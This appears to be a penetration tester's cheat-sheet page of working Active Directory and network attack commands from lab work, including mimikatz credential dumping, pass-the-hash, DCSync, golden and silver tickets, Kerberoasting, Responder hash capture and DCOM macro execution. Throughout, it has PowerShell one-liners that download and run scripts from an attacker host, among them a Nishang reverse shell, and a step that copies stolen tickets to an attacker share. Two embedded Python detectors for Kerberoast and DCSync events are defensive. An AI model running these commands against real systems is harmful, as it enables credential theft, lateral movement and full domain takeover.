Author: usafitz

Active Directory

RUNDOWN OF USEFUL TECHNIQUES

======================================================

TGT USE WITH AUTHENTICATION

└─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345
└─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected]

======================================================

CONNECTIONS VIA CRACKMAPEXEC / PTH / EVIL-WINRM

CHECK THE ACCOUNT LOCKOUT THRESHOLD FIRST IF YOU CAN:
PS C:\Users\computer.corp> net accounts

└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345

└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz

└─$ crackmapexec smb 10.10.1.299 -u administrator -H 'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam

└─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd

└─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299

└─$ xfreerdp /u:user04 /d:domain.com /p:password12345 /v:10.10.1.299

└─$ rdesktop 10.10.1.299 -u user03 -p password12345

C:\tmp>.\psexec.exe \\dc-dc01 cmd.exe (MAYBE...)
sekurlsa::pth SPAWNS ITS PROCESS ON THE INTERACTIVE DESKTOP, SO RUN IT FROM AN RDP SESSION

mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe

======================================================

SCRIPTS

SERVICE ACCOUNTS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')

LIST USERS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')

LIST EVERYTHING
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')

SPECIFY A NAME BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')

POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')

CHECK CREDENTIALS BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1') <-- ONLY TO VERIFY

KERBEROAST
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')

REVERSE SHELL (NISHANG)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1')

======================================================

KERBEROAST - NEED PRIV'D ACCOUNT (LIKE ADMINISTRATOR)

IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')

Invoke-Kerberoast -outputformat hashcat | fl
└─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt
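The defender's view of the Kerberoast steps above, added here as an example and not taken from the author's notes: every service ticket request lands on the DC as Security event 4769, and a roasting run shows up as one requester pulling a burst of RC4 (etype 0x17) tickets for user-account SPNs within a short window, while normal traffic is mostly AES tickets and machine-account SPNs. The field names follow event 4769; the event records, account names, addresses and thresholds are constructed for illustration.

```python
"""Flag Kerberoast-style TGS request patterns in Windows Security event 4769 records.

Added example; the events below are constructed, not captured from the page's lab.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Ticket encryption types as logged in the 4769 TicketEncryptionType field.
RC4_HMAC = "0x17"
AES_TYPES = {"0x11", "0x12"}  # AES128-CTS / AES256-CTS
SUCCESS = "0x0"

# Constructed 4769 records: user02 requests three RC4 tickets for user-account
# SPNs inside two seconds (the shape Invoke-Kerberoast produces), mixed with a
# machine-account AES ticket, a normal AES service ticket and one lone RC4 ticket.
SAMPLE_4769 = [
    {"TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "user02@CORP.COM",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.1.50"},
    {"TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "user02@CORP.COM",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.1.50"},
    {"TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "user02@CORP.COM",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.1.50"},
    {"TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "user02@CORP.COM",
     "ServiceName": "CLIENT06$", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "::ffff:10.10.1.50"},
    {"TimeCreated": "2024-05-01T10:05:00", "TargetUserName": "user03@CORP.COM",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "::ffff:10.10.1.51"},
    {"TimeCreated": "2024-05-01T10:07:00", "TargetUserName": "user04@CORP.COM",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.1.52"},
]


def is_roastable_request(ev):
    """True for a successful RC4 service ticket issued for a user (not machine) account.

    Machine accounts end in '$' and krbtgt is the TGT service; neither is what a
    roasting run targets, and both commonly still appear with various etypes."""
    svc = ev["ServiceName"]
    return (ev["Status"] == SUCCESS
            and ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect_kerberoast(events, min_spns=3, window=timedelta(seconds=60)):
    """Return {requester: sorted SPN list} for requesters that obtained RC4 tickets
    for at least `min_spns` distinct user-account SPNs inside `window`."""
    per_user = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_user[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))

    alerts = {}
    for user, reqs in per_user.items():
        reqs.sort()
        start = 0
        # Sliding window over the sorted timestamps; alert on the first window
        # that contains enough distinct SPNs.
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            spns = {spn for _, spn in reqs[start:end + 1]}
            if len(spns) >= min_spns:
                alerts[user] = sorted(spns)
                break
    return alerts


def rc4_single_requests(events):
    """Lower-severity list of every RC4 user-SPN ticket, useful for finding service
    accounts that still negotiate RC4 even when no burst is seen."""
    return sorted({(ev["TargetUserName"], ev["ServiceName"])
                   for ev in events if is_roastable_request(ev)})


if __name__ == "__main__":
    for user, spns in detect_kerberoast(SAMPLE_4769).items():
        print(f"possible Kerberoast burst by {user}: {', '.join(spns)}")
    for user, spn in rc4_single_requests(SAMPLE_4769):
        print(f"RC4 service ticket: {user} -> {spn}")
```

The threshold and window are the tuning knobs: a single RC4 ticket is a hygiene finding (the service account should be moved to AES via msDS-SupportedEncryptionTypes or to a gMSA, which the page covers later), while a burst from one requester is the alert. Event 4769 logging requires the "Audit Kerberos Service Ticket Operations" subcategory to be enabled on the DCs.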

======================================================

CREATE REVERSE DNS ENTRY ON THE DC (FROM HTB INTELLIGENCE)

python3 dnstool.py -u 'intelligence\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154

VERIFY
└─$ nslookup   
> server 10.129.95.154
> webstuff.intelligence.htb

======================================================

IF YOU SEE GMSA PRIVILEGES (FROM HTB INTELLIGENCE)

└─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb

LOOKING FOR SERVICE ACCOUNT HASH DUMPS

THIS DUMPS THE HASH FOR THE SERVICE ACCOUNT
svc_int$:::16cba97b4bc423795585b0b4bcee5047

======================================================

TIME SYNC (KERBEROS REJECTS REQUESTS WHEN CLOCK SKEW EXCEEDS 5 MINUTES BY DEFAULT)

└─$ timedatectl set-ntp false
└─$ sudo rdate -n dc.intelligence.htb

OPTIONAL: sudo ntpdate 10.129.95.154

======================================================

DC SYNC

mimikatz # lsadump::dcsync /user:Administrator
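A detection counterpart to lsadump::dcsync, added here as an example rather than taken from the author's notes: DCSync asks a DC for directory changes using the replication control access rights, and when the domain object carries a SACL for those rights each request is logged as Security event 4662 with the right's GUID in the Properties field. Only domain controllers (and a vetted sync service, if any) should ever exercise them. The GUIDs are the well-known Active Directory schema values; the event records, account names and the allow-list of expected replicators are constructed.

```python
"""Flag directory replication requests (Security event 4662) made by accounts that
are not domain controllers: the access pattern behind lsadump::dcsync.

Added example; the events below are constructed, not captured from the page's lab.
"""
import re

# Control access rights needed to pull directory changes (well-known schema GUIDs).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}

# Accounts that legitimately replicate: the DC computer accounts plus any vetted
# sync service. Constructed placeholders; populate from your own DC inventory.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_placeholder"}

GUID_RE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed 4662 records. Properties is free text listing the GUIDs of the
# rights or attributes accessed; AccessMask 0x100 means "control access".
SAMPLE_4662 = [
    {"TimeCreated": "2024-05-01T11:00:00", "SubjectUserName": "DC02$",
     "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=com", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"TimeCreated": "2024-05-01T11:02:10", "SubjectUserName": "user05_admin",
     "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=com", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary attribute read on a user object; the GUID here is a constructed
    # placeholder standing in for a normal attribute, not a real schema value.
    {"TimeCreated": "2024-05-01T11:03:00", "SubjectUserName": "user01",
     "SubjectDomainName": "CORP", "ObjectName": "CN=user01,CN=Users,DC=corp,DC=com",
     "AccessMask": "0x10",
     "Properties": "Read Property\n\t{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
]


def replication_rights_in(properties):
    """Return the replication-right GUIDs present in a 4662 Properties field."""
    return {g.lower() for g in GUID_RE.findall(properties)} & REPLICATION_RIGHTS


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Return one alert per 4662 event that exercises a replication right from a
    subject outside the expected replicator set."""
    expected_upper = {e.upper() for e in expected}
    alerts = []
    for ev in events:
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights or ev["SubjectUserName"].upper() in expected_upper:
            continue
        alerts.append({
            "time": ev["TimeCreated"],
            "subject": f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}',
            "object": ev["ObjectName"],
            "rights": sorted(rights),
            # Get-Changes-All is the right that returns secret attributes (hashes).
            "full_dump": DS_REPLICATION_GET_CHANGES_ALL in rights,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_4662):
        print(f'{a["time"]} replication request by {a["subject"]} on {a["object"]} '
              f'(secrets: {a["full_dump"]})')
```

Two prerequisites on the DC side: the "Audit Directory Service Access" subcategory must be enabled, and the domain head needs a SACL auditing the "Replicating Directory Changes" rights, otherwise no 4662 is ever written for these requests. The allow-list should be generated from the actual DC list rather than typed by hand, since a stale entry is the easiest way to silence this check.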

======================================================

SILVER TICKET

USING SERVICE ACCOUNT DISCOVERED USING GMSA (svc_int$)

└─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator 'intelligence.htb/svc_int$' -hashes HASH:HASH

└─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/[email protected]

======================================================

GOLDEN BUT NOT GOLDEN TICKET

C:\>whoami /user (LOOKING FOR SID)

mimikatz # kerberos::purge
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt

mimikatz # kerberos::list

ARGUMENTS PASSED TO kerberos::golden FOR THIS TICKET:  /user /domain /sid /target /service:HTTP /rc4

NOTE: CAN'T DO THIS WITH CLEAR-TEXT PASSWORD... MUST HASH FIRST

======================================================

GOLDEN TICKET

C:\Tools\active_directory> psexec.exe \\dc01 cmd.exe
ACCESS DENIED WHICH CACHES THE HASH

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
mimikatz # misc::cmd

C:\Users\user02.corp> psexec.exe \\dc01 cmd.exe

======================================================

DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT)
SHOW AVAILABLE METHODS - LOOKING FOR RUN AND WORKBOOK

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$com | Get-Member

CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD)
Sub mymacro()
    Shell ("notepad.exe")
End Sub

SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$LocalPath = "C:\Users\user05_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
# Excel runs under the SYSTEM profile on the target and needs this Desktop folder to exist before Workbooks.Open succeeds
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")

======================================================

SERVICE TICKET REQUEST
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets

PS C:\tmp> Add-Type -AssemblyName System.IdentityModel
PS C:\tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com'
PS C:\tmp> klist

THEN MIMIKATZ
sekurlsa::tickets - we see the ticket for HTTP
kerberos::list /export

THEN SEND THE FILE TO ATTACK COMPUTER
PS C:\tmp> copy .\2-40a50000-client06$@HTTP~MSSQL.domain.com-SVCORP.COM.kirbi \\192.168.119.299\share\

THEN CRACK
└─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi

CRACK WITH JOHN OR HASHCAT
kirbi2john mssql.kirbi > mssql.hash
john mssql.hash
hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt (MODE 5600 IS NETNTLMV2, I.E. THE HASH RESPONDER CAPTURES; TGS-REP RC4 TICKETS ARE MODE 13100 AS IN THE KERBEROAST SECTION)

======================================================

POWERVIEW

IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')

Get-NetSession -ComputerName client06 (WORKED)

Get-NetLoggedon -ComputerName client06 (WORKED)

======================================================

RESPONDER
└─$ sudo responder -I tun0

THEN REQUEST SMB FILE SHARES VIA AUTHENTICATION
PS C:\tmp\tickets> net use \\192.168.119.299\share /USER:domain.com\user04

ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!!
PS C:\tmp\tickets> net use \\192.168.119.299\share

MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.com\user03)

======================================================

BLOODHOUND
└─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All

sudo neo4j console

BLOODHOUND GUI - CHANGE THE DEFAULT neo4j PASSWORD AT http://localhost:7474

bloodhound

IMPORT THE JSON FILES

======================================================

SMB FILE MOVEMENT

AUTHENTICATE: PS C:\tmp\tickets> net use \\192.168.119.299\share student /USER:student

MOVE FILES: PS C:\tmp\tickets> copy .\FILE.kirbi \\192.168.119.299\share\

TO STOP THE SHARE:  net use \\192.168.119.299\share /DELETE

======================================================

AD SCRIPT REFERENCE
ALL ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
    Write-Host "------------------------"
}


AD SCRIPT REFERENCE
SERVICE ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
}


AD SCRIPT REFERENCE
LIST USERS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Searcher.FindAll()


AD SCRIPT REFERENCE
CHANGE SCRIPT TO GET A CERTAIN NAME
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="name=Domain Admins"
$Searcher.FindAll()

Attack Tools

ATTACK TOOLS

…tools and uses vary
…take a look at the use of each before attempting


Web Server Enumeration

WEB
PORT 80
PORT 443

…web server ports are not limited to these, look for open http services
…multiple attack vectors


Ports and Explanations

These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…

PORTS QUICK REFERENCE (DESKTOP BROWSER)

-----------------------------------------------------------------------------
            - FIND AVAILABLE NETWORK CONNECTIONS
                nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21          - FTP
            Try anonymous logins
-----------------------------------------------------------------------------
25          - SMTP (EMAIL)
                telnet 10.11.1.72 25
                VRFY user
                FINISH SESSION:  Ctl + ] / close
                VULN - SHELLSHOCK - need valid email address
                python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110         - POP
143         - IMAP
587         - SMTP SUBMISSION (AUTHENTICATED, USUALLY STARTTLS)
                nc -nv 10.11.1.72 25
                nc -nvC 10.11.1.72 110
                USER enter-user
                PASS enter-pass
-----------------------------------------------------------------------------
80 / 443    - WEB
                dirb / dirbuster / gobuster / nikto / curl
                RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464    - KERBEROS
                pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111         - NFS mounts (showmount -a / -e)
-----------------------------------------------------------------------------
135         - RPC: Remote Procedure Call
                impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445   - SMB (smbmap -H / smbclient -L / nmblookup -A / nbtscan)
                nmap --script nbstat.nse <ip>
                nmap --script smb-os-discovery  <ip>
                nmap --script smb-enum-shares -p139,445 <ip>
                nmap --script smb-vuln* <ip>
                'net' command on kali
                crackmapexec smb -u -p
                rpcclient -U '' -N
                impacket-lookupsid
                enum4linux
                ---------------------------------------------------------------
                CIFS (OLD WIN NT 4.0)
                SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 / WIN SRV 2003 R2
                SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
                SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
                SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
                SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
                SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433        - MSSQL
                nmap --script ms-sql* -p1433
                sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268  - LDAP (INDICATOR OF DC)
                nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse 
                nmap -p 389 --script ldap-search <ip>
                dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220 
                impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------   
3389        - RDP
            rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
            evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------

Generic Remote Enumeration

All listed items are separate commands unless otherwise specified…

NMAP - STANDARD FIRST APPROACH

…if sudo is required, it will let you know
…otherwise, just use the pasted command

nmap -A -T4 -p- -sS -O -oN nmap_10.10.1.299.txt <ip>
nmap -A -T4 -p- -sS -O -oA nmap_10.10.1.299 <ip>          (-oA WRITES NORMAL, GREPABLE AND XML OUTPUT WITH THIS BASENAME)
nmap -sU --top-ports 100 -vv <ip>
nmap -sV -vv -p <ports> --script vuln <ip>

SQL & SQL Injection

All commands listed here assume you have a command prompt…
All listed items are separate commands unless otherwise specified…

RESOURCES TO USE DURING TESTING

this is a MSSQL Practical Injection cheat sheet
this is another SQL injection sheet
this is a list of escape characters
…there are plenty more online


Linux System Enumeration

All commands listed here assume you have a command prompt…
All listed items are separate commands unless otherwise specified…

SIMPLE LINUX ENUMERATION

cat ~/.bash_history
cat /etc/issue
cat /proc/version
whoami
ifconfig
ip addr
hostname
pwd
ls -alh /var/www/html
cat wp-config.php

SMB Server Enumeration

FIND SMB VERSION

…this can be done using wireshark
…or the techniques seen below

SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.

enum4linux -a ip
nbtscan ip

…keeping this for reference… used in a particular technique for SMB v2

sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]
T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
  .....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.

FTP Server Enumeration

AUTOMATIC LOGON

~/.netrc